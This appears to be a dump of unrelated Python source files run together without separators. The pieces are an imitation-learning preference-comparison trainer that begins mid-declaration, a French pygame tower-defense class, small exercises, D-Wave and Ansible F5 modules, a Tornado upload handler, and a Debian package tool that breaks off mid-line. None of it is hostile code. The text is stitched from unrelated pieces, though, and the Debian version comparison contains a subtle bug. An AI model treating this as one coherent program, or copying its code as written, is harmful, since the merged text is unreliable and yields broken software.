PreferenceComparisons(base.BaseImitationAlgorithm): """Main interface for reward learning using preference comparisons.""" def __init__( self, trajectory_generator: TrajectoryGenerator, reward_model: reward_nets.RewardNet, fragmenter: Optional[Fragmenter] = None, preference_gatherer: Optional[PreferenceGatherer] = None, reward_trainer: Optional[RewardTrainer] = None, comparisons_per_iteration: int = 50, fragment_length: int = 50, transition_oversampling: float = 10, initial_comparison_frac: float = 0.1, initial_epoch_multiplier: float = 200.0, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, allow_variable_horizon: bool = False, seed: Optional[int] = None, ): """Initialize the preference comparison trainer. The loggers of all subcomponents are overridden with the logger used by this class. Args: trajectory_generator: generates trajectories while optionally training an RL agent on the learned reward function (can also be a sampler from a static dataset of trajectories though). reward_model: a RewardNet instance to be used for learning the reward fragmenter: takes in a set of trajectories and returns pairs of fragments for which preferences will be gathered. These fragments could be random, or they could be selected more deliberately (active learning). Default is a random fragmenter. preference_gatherer: how to get preferences between trajectory fragments. Default (and currently the only option) is to use synthetic preferences based on ground-truth rewards. Human preferences could be implemented here in the future. reward_trainer: trains the reward model based on pairs of fragments and associated preferences. Default is to use the preference model and loss function from DRLHP. comparisons_per_iteration: number of preferences to gather at once (before switching back to agent training). This doesn't impact the total number of comparisons that are gathered, only the frequency of switching between preference gathering and agent training. fragment_length: number of timesteps per fragment that is used to elicit preferences transition_oversampling: factor by which to oversample transitions before creating fragments. Since fragments are sampled with replacement, this is usually chosen > 1 to avoid having the same transition in too many fragments. initial_comparison_frac: fraction of the total_comparisons argument to train() that will be sampled before the rest of training begins (using a randomly initialized agent). This can be used to pretrain the reward model before the agent is trained on the learned reward, to help avoid irreversibly learning a bad policy from an untrained reward. Note that there will often be some additional pretraining comparisons since `comparisons_per_iteration` won't exactly divide the total number of comparisons. How many such comparisons there are depends discontinuously on `total_comparisons` and `comparisons_per_iteration`. initial_epoch_multiplier: before agent training begins, train the reward model for this many more epochs than usual (on fragments sampled from a random agent). custom_logger: Where to log to; if None (default), creates a new logger. allow_variable_horizon: If False (default), algorithm will raise an exception if it detects trajectories of different length during training. If True, overrides this safety check. WARNING: variable horizon episodes leak information about the reward via termination condition, and can seriously confound evaluation. Read https://imitation.readthedocs.io/en/latest/guide/variable_horizon.html before overriding this. seed: seed to use for initializing subcomponents such as fragmenter. Only used when default components are used; if you instantiate your own fragmenter, preference gatherer, etc., you are responsible for seeding them! """ super().__init__( custom_logger=custom_logger, allow_variable_horizon=allow_variable_horizon, ) # for keeping track of the global iteration, in case train() is called # multiple times self._iteration = 0 self.model = reward_model self.reward_trainer = reward_trainer or CrossEntropyRewardTrainer( reward_model, custom_logger=self.logger, ) # If the reward trainer was created in the previous line, we've already passed # the correct logger. But if the user created a RewardTrainer themselves and # didn't manually set a logger, it would be annoying if a separate one was used. self.reward_trainer.logger = self.logger # the reward_trainer's model should refer to the same object as our copy assert self.reward_trainer.model is self.model self.trajectory_generator = trajectory_generator self.trajectory_generator.logger = self.logger self.fragmenter = fragmenter or RandomFragmenter( custom_logger=self.logger, seed=seed, ) self.fragmenter.logger = self.logger self.preference_gatherer = preference_gatherer or SyntheticGatherer( custom_logger=self.logger, seed=seed, ) self.preference_gatherer.logger = self.logger self.comparisons_per_iteration = comparisons_per_iteration self.fragment_length = fragment_length self.transition_oversampling = transition_oversampling self.initial_comparison_frac = initial_comparison_frac self.initial_epoch_multiplier = initial_epoch_multiplier self.dataset = PreferenceDataset() def train( self, total_timesteps: int, total_comparisons: int, callback: Optional[Callable[[int], None]] = None, ) -> Mapping[str, Any]: """Train the reward model and the policy if applicable. Args: total_timesteps: number of environment interaction steps total_comparisons: number of preferences to gather in total callback: callback functions called at the end of each iteration Returns: A dictionary with final metrics such as loss and accuracy of the reward model. Raises: ValueError: `total_comparisons < self.comparisons_per_iteration`. """ initial_comparisons = int(total_comparisons * self.initial_comparison_frac) total_comparisons -= initial_comparisons iterations, extra_comparisons = divmod( total_comparisons, self.comparisons_per_iteration, ) if iterations == 0: raise ValueError( f"total_comparisons={total_comparisons} is less than " f"comparisons_per_iteration={self.comparisons_per_iteration}", ) timesteps_per_iteration, extra_timesteps = divmod(total_timesteps, iterations) reward_loss = None reward_accuracy = None for i in range(iterations): ########################## # Gather new preferences # ########################## num_pairs = self.comparisons_per_iteration # If the number of comparisons per iterations doesn't exactly divide # the desired total number of comparisons, we collect the remainder # right at the beginning to pretrain the reward model slightly. # WARNING: This means that slightly changing the total number of # comparisons or the number of comparisons per iteration can # significantly change the proportion of pretraining comparisons! # # In addition, we collect the comparisons specified via # initial_comparison_frac. if i == 0: num_pairs += extra_comparisons + initial_comparisons num_steps = math.ceil( self.transition_oversampling * 2 * num_pairs * self.fragment_length, ) self.logger.log(f"Collecting {num_steps} trajectory steps") trajectories = self.trajectory_generator.sample(num_steps) # This assumes there are no fragments missing initial timesteps # (but allows for fragments missing terminal timesteps). horizons = (len(traj) for traj in trajectories if traj.terminal) self._check_fixed_horizon(horizons) self.logger.log("Creating fragment pairs") fragments = self.fragmenter(trajectories, self.fragment_length, num_pairs) with self.logger.accumulate_means("preferences"): self.logger.log("gathering preferences") preferences = self.preference_gatherer(fragments) self.dataset.push(fragments, preferences) self.logger.log(f"Dataset now contains {len(self.dataset)} samples") ########################## # Train the reward model # ########################## # On the first iteration, we train the reward model for longer, # as specified by initial_epoch_multiplier. epoch_multiplier = 1.0 if i == 0: epoch_multiplier = self.initial_epoch_multiplier with self.logger.accumulate_means("reward"): self.logger.log("Training reward model") self.reward_trainer.train( self.dataset, epoch_multiplier=epoch_multiplier, ) reward_loss = self.logger.name_to_value["mean/reward/loss"] reward_accuracy = self.logger.name_to_value["mean/reward/accuracy"] ################### # Train the agent # ################### num_steps = timesteps_per_iteration # if the number of timesteps per iterations doesn't exactly divide # the desired total number of timesteps, we train the agent a bit longer # at the end of training (where the reward model is presumably best) if i == iterations - 1: num_steps += extra_timesteps with self.logger.accumulate_means("agent"): self.logger.log(f"Training agent for {num_steps} timesteps") self.trajectory_generator.train(steps=num_steps) self.logger.dump(self._iteration) ######################## # Additional Callbacks # ######################## if callback: callback(self._iteration) self._iteration += 1 return {"reward_loss": reward_loss, "reward_accuracy": reward_accuracy}
"""Module Partie""" import pygame import random from enums.Statut import Statut from enums.Menu import Menu from enums.Matiere import Matiere from enums.Filiere import Filiere from enums.EvenementsAleatoires import EvenementsAleatoires from Etudiant import Etudiant class Partie(): """Classe Partie : Gestion de la partie.""" def __init__(self, carte, affichage): """Constructeur classe Partie :param carte: Carte sur laquelle la partie se joue. :param affichage: Classe qui gere l'affichage de la partie actuelle.""" #Attributs self.carte = carte self.affichage = affichage self.etudiants = [] self.enseignants = [] self.statut = Statut.ENTRE_VAGUE self.timer = 5 self.vague = 0 self.dernier_seconde = pygame.time.get_ticks() self.file_attente_vague = [] self.dernier_apparition = 0 self.vie = 10 self.argent = 1000000 self.matiere_courante = Matiere.HISTOIRE self.evenement = EvenementsAleatoires.AUCUN def ajouter_etudiant(self, etudiant): """Procedure : Ajouter un etudiant dans la partie :param etudiant: Etudiant à ajouter.""" self.etudiants += [etudiant] def retirer_etudiant(self, etudiant): """Procedure : Retirer un etudiant de la partie :param etudiant: Etudiant à retirer.""" self.etudiants.remove(etudiant) del etudiant def ajouter_enseignant(self, enseignant): """Procedure : Ajouter un enseignant dans la partie :param enseignant: Enseignant à ajouter.""" self.enseignants += [enseignant] def retirer_enseignant(self, enseignant): """Procedure : Retirer un enseignant de la partie :param enseignant: Enseignant à retirer.""" self.enseignants.remove(enseignant) del enseignant def get_enseignant(self, coords): """Fonction qui retourne un enseignant aux coordonnées. :param coords: Coordonnées de l'enseignant recherché. :return: Enseignant.""" resultat = None for enseignant in self.enseignants: if enseignant.coords == coords: resultat = enseignant return resultat def get_affichage(self): """Fonction qui retourne l'affichage de la partie. :return: Affichage""" return self.affichage def rafraichir(self): """Procedure : Fait avancer le jeu (Temps entre-vague, faire avancer les etudiant, faire tirer les profs...)""" #Apparition des etudiants dans la vague if (len(self.file_attente_vague) > 0 and self.file_attente_vague[0][0] <= pygame.time.get_ticks()): mtn = pygame.time.get_ticks() # if mtn - self.dernier_apparition >= 500: #Delai entre les apparitions self.dernier_apparition = mtn # self.ajouter_etudiant(self.file_attente_vague[0][1]) self.file_attente_vague.pop(0) #Faire tirer les enseignants if len(self.enseignants) > 0: for enseignant in self.enseignants: enseignant.tirer() #Faire avancer les etudiants if len(self.etudiants) > 0: for etudiant in self.etudiants: etudiant.avancer() #Gestion transition vague car plus d'etudiants elif len(self.file_attente_vague) == 0: if self.statut == Statut.VAGUE: #Fin de vague self.statut = Statut.ENTRE_VAGUE self.timer = 5 self.argent += 25 + 10*(self.vague)**0.5 self.affichage.afficher_message("Fin de la vague.", 3) elif self.statut == Statut.ENTRE_VAGUE and self.timer > 0: mtn = pygame.time.get_ticks() # if mtn - self.dernier_seconde >= 1000: #Delai entre vague self.dernier_seconde = mtn # self.affichage.afficher_message("Nouvelle vague dans " + str(self.timer), 1) self.timer -= 1 elif self.statut == Statut.ENTRE_VAGUE and self.timer <= 0: self.statut = Statut.VAGUE self.vague += 1 #Choix evenements aléatoire msg_evenement = "" if self.vague % 7 == 5: self.evenement = EvenementsAleatoires.VENDREDI_MATIN msg_evenement = " - Vendredi matin ! Les etudiants sont affaiblis." elif self.vague % 18 == 0: self.evenement = EvenementsAleatoires.PARTIEL msg_evenement = " - Partiel ! Les etudiants sont entrainés." elif self.vague % 30 == 0: self.evenement = EvenementsAleatoires.RETOUR_VACANCES msg_evenement = " - Retour de vacances ! Les etudiants sont en forme et vont plus vite." self.affichage.afficher_message("Nouvelle vague ! (Vague " + str(self.vague) + ")" + msg_evenement, 3) effectifs = effectifs_vague(self.vague) for i in range(len(effectifs)-1, -1, -1): for j in range(0, effectifs[i]): etudiant = Etudiant(self.carte.chemin[0], self, i+1, random.choice(list(Filiere))) self.file_attente_vague += [(pygame.time.get_ticks() + 500*j, etudiant)] def perdre_vie(self): """Procedure qui fait perdre une vie au joueur et le notifie.""" if self.vie == 0: self.affichage.menu = Menu.PERDU self.affichage.afficher_message("Fin de la partie ! Vous n'avez plus de vies", 10) else: self.vie -= 1 self.affichage.afficher_message("Vous avez perdu une vie ! Il vous en reste " + str(self.vie), 3) def effectifs_vague(vague): """Fonction qui retourne le nombre d'etudiant a faire apparaitre dans la prochaine vague. :param vague: Entier : Numero de vague. :return: Tableau d'entiers : Nombre d'etudiants par type. """ resultat = [(vague * 3) % 15, (vague - 1) % 20, vague // 5] return resultat
import sys inf = sys.maxsize N, K = map(int, input().split()) heights = list(map(int, input().split())) dp = [inf]*N dp[0] = 0 def chmin(a, b, diff): if dp[a] > dp[b] + diff: dp[a] = dp[b] + diff return for i in range(N): for j in range(1, K+1): if i-j >= 0: chmin(i, i-j, abs(heights[i]-heights[i-j])) print(dp[N-1])
import os import re from visnav.settings import * if False: for fn in os.listdir(CACHE_DIR): m = re.match('^(.*?)(hi|lo)(\d{4})\.nsm$', fn) nfn = None if m: nfn = m[1]+m[3]+'_'+m[2]+'.nsm' elif re.match('.*?\d\.nsm$', fn): nfn = fn[:-4]+'_lo.nsm' if nfn is not None: os.rename(os.path.join(CACHE_DIR, fn), os.path.join(CACHE_DIR, nfn)) elif False: # ^iteration_ => rose_ # ^far => rose_far_ # ^shapemodel_ => rose_ for fn in os.listdir(CACHE_DIR): m = re.match('^(iteration_|shapemodel_|far)(.*?)$', fn) nfn = None if m: nfn = 'rose_' + ('far_' if m[1]=='far' else '') + m[2] if nfn is not None: #print('%s => %s'%(fn, nfn)) os.rename(os.path.join(CACHE_DIR, fn), os.path.join(CACHE_DIR, nfn)) else: # replace('F._P.', '_P.') for batch in ('mtp024', 'mtp025', 'mtp026'): path = os.path.join(DATA_DIR, 'rosetta-' + batch) for fn in os.listdir(path): m = re.match(r'.*?F\._P\.png$', fn) if m: nfn = fn.replace('F._P.', '_P.') os.rename(os.path.join(path, fn), os.path.join(path, nfn))
import sys as sys for word in sys.stdin: num_alph={} alph_index = {} repeated = set() palindromes = set() reverse_word = "" for i in range(1, len(word) + 1): reverse_word += word[-i] for letter in word: if letter not in num_alph: num_alph[letter] = 1 else: num_alph[letter] += 1 for letter in num_alph: if num_alph[letter] > 1: repeated.add(letter) for v in range(len(word)): if word[v] in repeated: if word[v] not in alph_index: alph_index[word[v]] = [v] else: alph_index[word[v]].append(v) for letter in alph_index: for c in (alph_index[letter][:-1]): letter_index = alph_index[letter].index(c) for n in (alph_index[letter][letter_index + 1:]): # print(n,c) if word[c:n + 1] == reverse_word[len(word) - n - 1:len(word) - c] and len(word[c:n + 1]) > 1: if word[c:n + 1] not in palindromes: palindromes.add(word[c:n + 1]) for pal in sorted(palindromes): print(pal) print()
from Calculator import Calculator compute = Calculator() print(compute.addition(10, 25)) print(compute.subtraction(5, 3)) print(compute.multiplication(5, 10)) print(compute.division(10, 2)) print(compute.exponent(5, 3)) print(compute.square_root(6)) print(compute.negate(200))
#Faça um programa que leia um número inteiro e mostre na tela o seu sucessor e o seu antecessor n = int(input('Digite um número: ')) print('\033[7;30mO sucessor do número {} é {}, e o antecessor é {}\033[m'.format(n, n+1, n-1))
from random import uniform import numpy as np import math class Classifier: def __init__(self, input_size, learning_rate, momentum): self.input_size = input_size self.learning_rate = learning_rate self.momentum = momentum self.weights = np.random.uniform(-0.05, 0.05, self.input_size) self.previous_weight_changes = np.zeros(input_size) def get_output(self, inputs_): # print(type(inputs_)) # print(type(self.weights)) z = np.dot(inputs_, self.weights) if z < -100: # protect against overflow z = -100 if z > 100: z = 100 return self.activation_function(z) def activation_function(self, z): return 1 / (1 + (math.exp(-z))) def update_weights(self, inputs_, error): weight_changes = (self.learning_rate * error) * inputs_ + (self.momentum * self.previous_weight_changes) self.weights += weight_changes self.previous_weight_changes = weight_changes return self.weights def get_weights(self): return self.weights def reset_previous_weight_changes(self): self.previous_weight_changes = np.zeros(self.input_size)
# Copyright 2021 D-Wave Systems Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """``spinbosonchain`` is a Python library for simulating the dynamics of a generalized spin-boson chain model, where both the :math:`z`- and :math:`y`-components of the spins are coupled to bosonic baths, rather than only the :math:`z`-components. The library adopts the quasi-adiabatic path integral (QUAPI) formalism to express the spin system's reduced density matrix as a time-discretized path integral, comprising of a series of influence functionals that encode the non-Markovian dynamics of the system. The path integral is decomposed into a series of components that can be represented by tensor networks. ``spinbosonchain`` currently relies heavily on Google's TensorNetwork_ package for its implementation of tensor networks and related operations. .. _tensornetwork: https://github.com/google/TensorNetwork """ ##################################### ## Load libraries/packages/modules ## ##################################### # Load subpackages. # Load modules. from . import scalar from . import system from . import bath from . import compress from . import alg from . import state from . import ev from . import report from . import version ############################ ## Authorship information ## ############################ __author__ = "D-Wave Systems Inc." __copyright__ = "Copyright 2021" __credits__ = ["Matthew Fitzpatrick"] __version__ = version.version __full_version__ = version.full_version __maintainer__ = "D-Wave Systems Inc." __email__ = "support@dwavesys.com" __status__ = "Development" ################################### ## Useful background information ## ################################### # See e.g. ``https://docs.python.org/3/reference/import.html#regular-packages`` # for a brief discussion of ``__init__.py`` files. ################################## ## Define classes and functions ## ################################## # List of public objects in package. __all__ = ["scalar", "system", "bath", "compress", "alg", "state", "ev", "report", "version", "show_config"] def show_config(): """Print information about the version of ``spinbosonchain`` and libraries it uses. Parameters ---------- Returns ------- """ print(version.version_summary) return None
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright 2016 F5 Networks Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: bigip_irule short_description: Manage iRules across different modules on a BIG-IP. description: - Manage iRules across different modules on a BIG-IP. version_added: "2.2" options: content: description: - When used instead of 'src', sets the contents of an iRule directly to the specified value. This is for simple values, but can be used with lookup plugins for anything complex or with formatting. Either one of C(src) or C(content) must be provided. module: description: - The BIG-IP module to add the iRule to. required: true choices: - ltm - gtm partition: description: - The partition to create the iRule on. required: false default: Common name: description: - The name of the iRule. required: true src: description: - The iRule file to interpret and upload to the BIG-IP. Either one of C(src) or C(content) must be provided. required: true state: description: - Whether the iRule should exist or not. required: false default: present choices: - present - absent notes: - Requires the f5-sdk Python package on the host. This is as easy as pip install f5-sdk. extends_documentation_fragment: f5 requirements: - f5-sdk author: - Tim Rupp (@caphrim007) ''' EXAMPLES = ''' - name: Add the iRule contained in templated irule.tcl to the LTM module bigip_irule: content: "{{ lookup('template', 'irule-template.tcl') }}" module: "ltm" name: "MyiRule" password: "secret" server: "lb.mydomain.com" state: "present" user: "admin" delegate_to: localhost - name: Add the iRule contained in static file irule.tcl to the LTM module bigip_irule: module: "ltm" name: "MyiRule" password: "secret" server: "lb.mydomain.com" src: "irule-static.tcl" state: "present" user: "admin" delegate_to: localhost ''' RETURN = ''' module: description: The module that the iRule was added to returned: changed and success type: string sample: "gtm" src: description: The filename that included the iRule source returned: changed and success, when provided type: string sample: "/opt/src/irules/example1.tcl" name: description: The name of the iRule that was managed returned: changed and success type: string sample: "my-irule" content: description: The content of the iRule that was managed returned: changed and success type: string sample: "when LB_FAILED { set wipHost [LB::server addr] }" partition: description: The partition in which the iRule was managed returned: changed and success type: string sample: "Common" ''' try: from f5.bigip import ManagementRoot from icontrol.session import iControlUnexpectedHTTPError HAS_F5SDK = True except ImportError: HAS_F5SDK = False MODULES = ['gtm', 'ltm'] class BigIpiRule(object): def __init__(self, *args, **kwargs): if not HAS_F5SDK: raise F5ModuleError("The python f5-sdk module is required") if kwargs['state'] != 'absent': if not kwargs['content'] and not kwargs['src']: raise F5ModuleError( "Either 'content' or 'src' must be provided" ) source = kwargs['src'] if source: with open(source) as f: kwargs['content'] = f.read() # The params that change in the module self.cparams = dict() # Stores the params that are sent to the module self.params = kwargs self.api = ManagementRoot(kwargs['server'], kwargs['user'], kwargs['password'], port=kwargs['server_port']) def flush(self): result = dict() state = self.params['state'] try: if state == "present": changed = self.present() elif state == "absent": changed = self.absent() except iControlUnexpectedHTTPError as e: raise F5ModuleError(str(e)) result.update(**self.cparams) result.update(dict(changed=changed)) return result def read(self): """Read information and transform it The values that are returned by BIG-IP in the f5-sdk can have encoding attached to them as well as be completely missing in some cases. Therefore, this method will transform the data from the BIG-IP into a format that is more easily consumable by the rest of the class and the parameters that are supported by the module. """ p = dict() name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if module == 'ltm': r = self.api.tm.ltm.rules.rule.load( name=name, partition=partition ) elif module == 'gtm': r = self.api.tm.gtm.rules.rule.load( name=name, partition=partition ) if hasattr(r, 'apiAnonymous'): p['content'] = str(r.apiAnonymous.strip()) p['name'] = name return p def delete(self): params = dict() check_mode = self.params['check_mode'] module = self.params['module'] params['name'] = self.params['name'] params['partition'] = self.params['partition'] self.cparams = camel_dict_to_snake_dict(params) if check_mode: return True if module == 'ltm': r = self.api.tm.ltm.rules.rule.load(**params) r.delete() elif module == 'gtm': r = self.api.tm.gtm.rules.rule.load(**params) r.delete() if self.exists(): raise F5ModuleError("Failed to delete the iRule") return True def exists(self): name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if module == 'ltm': return self.api.tm.ltm.rules.rule.exists( name=name, partition=partition ) elif module == 'gtm': return self.api.tm.gtm.rules.rule.exists( name=name, partition=partition ) def present(self): if self.exists(): return self.update() else: return self.create() def update(self): params = dict() current = self.read() changed = False check_mode = self.params['check_mode'] content = self.params['content'] name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if content is not None: content = content.strip() if 'content' in current: if content != current['content']: params['apiAnonymous'] = content else: params['apiAnonymous'] = content if params: changed = True params['name'] = name params['partition'] = partition self.cparams = camel_dict_to_snake_dict(params) if 'api_anonymous' in self.cparams: self.cparams['content'] = self.cparams.pop('api_anonymous') if self.params['src']: self.cparams['src'] = self.params['src'] if check_mode: return changed else: return changed if module == 'ltm': d = self.api.tm.ltm.rules.rule.load( name=name, partition=partition ) d.update(**params) d.refresh() elif module == 'gtm': d = self.api.tm.gtm.rules.rule.load( name=name, partition=partition ) d.update(**params) d.refresh() return True def create(self): params = dict() check_mode = self.params['check_mode'] content = self.params['content'] name = self.params['name'] partition = self.params['partition'] module = self.params['module'] if check_mode: return True if content is not None: params['apiAnonymous'] = content.strip() params['name'] = name params['partition'] = partition self.cparams = camel_dict_to_snake_dict(params) if 'api_anonymous' in self.cparams: self.cparams['content'] = self.cparams.pop('api_anonymous') if self.params['src']: self.cparams['src'] = self.params['src'] if check_mode: return True if module == 'ltm': d = self.api.tm.ltm.rules.rule d.create(**params) elif module == 'gtm': d = self.api.tm.gtm.rules.rule d.create(**params) if not self.exists(): raise F5ModuleError("Failed to create the iRule") return True def absent(self): changed = False if self.exists(): changed = self.delete() return changed def main(): argument_spec = f5_argument_spec() meta_args = dict( content=dict(required=False, default=None), src=dict(required=False, default=None), name=dict(required=True), module=dict(required=True, choices=MODULES) ) argument_spec.update(meta_args) module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True, mutually_exclusive=[ ['content', 'src'] ] ) try: obj = BigIpiRule(check_mode=module.check_mode, **module.params) result = obj.flush() module.exit_json(**result) except F5ModuleError as e: module.fail_json(msg=str(e)) from ansible.module_utils.basic import * from ansible.module_utils.ec2 import camel_dict_to_snake_dict from ansible.module_utils.f5_utils import * if __name__ == '__main__': main()
from datetime import datetime import io import os from absl import logging # noqa: F401 import tornado.web from icubam.db import store, synchronizer from icubam.www.handlers import base class DatasetHandler(base.APIKeyProtectedHandler): ROUTE = '/db/(.*)' API_COOKIE = 'api' ACCESS = [ store.AccessTypes.STATS, store.AccessTypes.ALL, store.AccessTypes.UPLOAD ] GET_ACCESS = [store.AccessTypes.ALL, store.AccessTypes.STATS] POST_ACCESS = [store.AccessTypes.UPLOAD, store.AccessTypes.STATS] def initialize(self, config, db_factory, dataset, upload_path): super().initialize(config, db_factory) self.dataset = dataset self.upload_path = upload_path @base.authenticated(code=503) def get(self, collection): file_format = self.get_query_argument('format', default=None) max_ts = self.get_query_argument('max_ts', default=None) df = self.dataset.get(collection, max_ts) if df is None: logging.info("API called with incorrect endpoint: {collection}.") self.set_status(404) return if file_format == 'csv': stream = io.StringIO() df.to_csv(stream, index=False) self.write(stream.getvalue()) else: self.write(df.to_html()) @tornado.web.authenticated def post(self, collection): if self.current_user.access_type not in self.POST_ACCESS: logging.info( f"API called with incorrect access_type: {self.current_user.access_type}." ) self.set_status(403) return # Send to the correct endpoint: if collection == 'bedcounts': csvp = synchronizer.CSVPreprocessor(self.db) # Get the file object and format request: file = self.request.files["file"][0] file_format = self.get_query_argument('format', default=None) file_name = None # Pre-process with the correct method: if file_format == 'ror_idf': input_buf = io.StringIO(file["body"].decode('utf-8')) try: csvp.sync_bedcounts_ror_idf(input_buf) except Exception as e: logging.error(f"Couldn't sync: {e}") file_name = 'ror_idf' else: logging.debug("API called with incorrect file_format: {file_format}.") self.set_status(400) return # Save the file locally just in case: time_str = datetime.now().strftime('%Y-%m-%d-%H:%M:%S') file_path = os.path.join(self.upload_path, f"{time_str}-{file_name}") try: with open(file_path, "wb") as f: f.write(file["body"]) logging.info(f"Received {file_path} from {self.request.remote_ip}.") except IOError as e: logging.error(f"Failed to write file due to IOError: {e}") # Or 404 if bad endpoint: else: logging.error(f"DB POST accessed with incorrect endpoint: {collection}.") self.set_status(404) return
""" Miscellaneous files used throughout the workflow. The static members of the class ``files`` are populated automatically as the workflow reads the user config. """ from sphinx_mock import * class files: """Houses lists of support files used throughout the workflow.""" #: The manually-uploaded datasets for this article that must be downloaded zenodo_files_manual = [] #: The showyourwork-managed datasets for this article zenodo_files_auto = [] #: The `.zenodo` files in which we store the URL for the datasets #: We make the PDF generation depend on these so we always have #: access to the URLs for the icon generation. #: These are updated in `zenodo.smk`. dot_zenodo = [] #: Auxiliary files we copy over to the user's `src/` directory. aux = [ posix(relpaths.tex / file.name) for file in (abspaths.workflow / "resources" / "tex").glob("*.*") ] #: Class-specific auxiliary files. cls = {} for folder in (abspaths.workflow / "resources" / "classes").glob("*"): cls[folder.name] = [ file.name for file in (abspaths.workflow / "resources" / "classes" / folder).glob( "*.*" ) ] #: Dependencies of the manuscript defined by the user for file in config["dependencies"]: if file == config["ms"]: ms_deps = config["dependencies"][file] break else: ms_deps = [] #: Dummy file dependency for figures w/ unknown parent scripts. unknown = "unknown-script" #: Temporary tex file. tmp_xml = ".showyourwork-xml-ms" #: Temporary tex file. tmp_syw = ".showyourwork-ms" if config["tectonic_latest"]: #: Tectonic command tectonic = [posix(relpaths.temp / "tectonic")] else: #: Tectonic command tectonic = [] #: Figures that are allowed directly in the ``src/`` directory special_figures = ["orcid-id.png", "orcid-ID.png", "showyourwork.pdf"] #: Store temporary exception messages exception = relpaths.temp / "exception.log" #: Store temporary warning messages warning = relpaths.temp / "warning.log" #: Recognized figure script extensions script_extensions = [] for ext in config["scripts"]: script_extensions.append(ext)
import requests import shutil import bz2 import os import hashlib import io from urllib.parse import urlparse import re from queue import Queue import itertools from functools import reduce __all__ = [ 'Repo', 'LocalRepo', 'RepoSet', 'Package', 'PkgReq', ] class HashTools: """ https://stackoverflow.com/a/3431835/5279817 """ @classmethod def hash_bytestr_iter(cls, bytesiter, hasher, ashexstr=False): for block in bytesiter: hasher.update(block) return (hasher.hexdigest() if ashexstr else hasher.digest()) @classmethod def file_as_blockiter(cls, afile, blocksize=0x10000): with afile: block = afile.read(blocksize) while len(block) > 0: yield block block = afile.read(blocksize) @classmethod def hash_file(cls, filename, hasher, ashexstr=False): with open(filename, 'rb') as f: return cls.hash_bytestr_iter(cls.file_as_blockiter(f), hasher, ashexstr) class Utils: @staticmethod def download_file(url, local_filename=None): if local_filename is None: local_filename = url.split('/')[-1] print('[*] Downloading %s to %s'%(url, local_filename)) r = requests.get(url, stream=True) with open(local_filename, 'wb') as f: shutil.copyfileobj(r.raw, f) return local_filename @staticmethod def asstring_to_dict(asstring): ret = dict() key = None for raws in asstring.split('\n'): s = raws.strip() if not s: continue # comment if raws[0] == '#': continue if ':' in s: key, val = s.split(':', maxsplit=1) ret[key] = val.strip() else: if key is None: raise Exception('Expected `:` on line %s' % raws) ret[key] = '\n'.join((ret[key], raws)) return ret class DebianVersion: EPOCH_REGEX = re.compile(r'^([0-9]*(?=:))?:(.*)') def __init__(self, s): s = s.strip() epoch_match = self.EPOCH_REGEX.match(s) if epoch_match: self.epoch = int(epoch_match.group(1)) v = epoch_match.group(2) else: self.epoch = 0 v = s v = v.rsplit('-', 1) self.upstream = v[0] self.revision = v[1] if len(v) != 1 else '' @staticmethod def _char_code(c): if len(c) != 1: c = c[0] if c == '~': return 0; # tilde sort before anything if (ord('a') <= ord(c) <= ord('z')) or (ord('A') <= ord(c) <= ord('Z')): return ord(c) - ord('A') + 1 if c in '.+-': return ord(c) + ord('z') + 1 raise Exception('Unexpected char %s in charcode' % c) @classmethod def _cmp_vers(cls, l, r): alpre = re.compile(r'([^0-9]*)([0-9]*.*)') numre = re.compile(r'([0-9]*)([^0-9]*.*)') anow = True while l and r: rgx = alpre if anow else numre lm = rgx.match(l) rm = rgx.match(r) l = lm.group(2) r = rm.group(2) lg = lm.group(1) rg = rm.group(1) if lg != rg: if anow: for lc, rc in zip(lg, rg): diff = cls._char_code(lc) - cls._char_code(rg) if diff != 0: return diff # tilde is sorted before empty part if len(lg) > len(rg): return -1 if lg[len(rg)] == '~' else +1 elif len(lg) < len(rg): return +1 if rg[len(lg)] == '~' else -1 else: diff = int(lg) - int(rg) if diff != 0: return diff anow = not anow if l or r: if len(l) > len(r): return -1 if l[len(r)] == '~' else +1 elif len(l) < len(r): return +1 if r[len(l)] == '~' else -1 return 0 def _cmp(self, other): diff = self.epoch - other.epoch diff = self._cmp_vers(self.upstream, other.upstream) if diff == 0 else diff diff = self._cmp_vers(self.revision, other.revision) if diff == 0 else diff return (1 if diff > 0 else -1) if diff != 0 else 0 def __eq__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) == 0 def __ne__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) != 0 def __lt__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) < 0 def __le__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) <= 0 def __gt__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) > 0 def __ge__(self, other): if not isinstance(other, self.__class__): return NotImplemented return self._cmp(other) >= 0 def __str__(self): vers = self.upstream if self.revision: vers = '-'.join((vers, self.revision)) if self.epoch: vers = ':'.join((str(self.epoch), vers)) return vers def __repr__(self): return '<epoch={} upstream={} revision={}>'.format(self.epoch, self.upstream, self.revision) def __hash__(self): return hash(str(self)) class VersionReq: OPS = { '>>': (1,), '<<': (-1,), '==': (0,), '!=': (-1, 1), '>=': (0, 1), '<=': (-1, 0), } def __init__(self, s): s = s.strip() # hack for firmware if s.startswith('firmware'): s = s[len('firmware'):].strip() op = s[:2] # dirty hack for one char variants if op[0] in '<=>' and 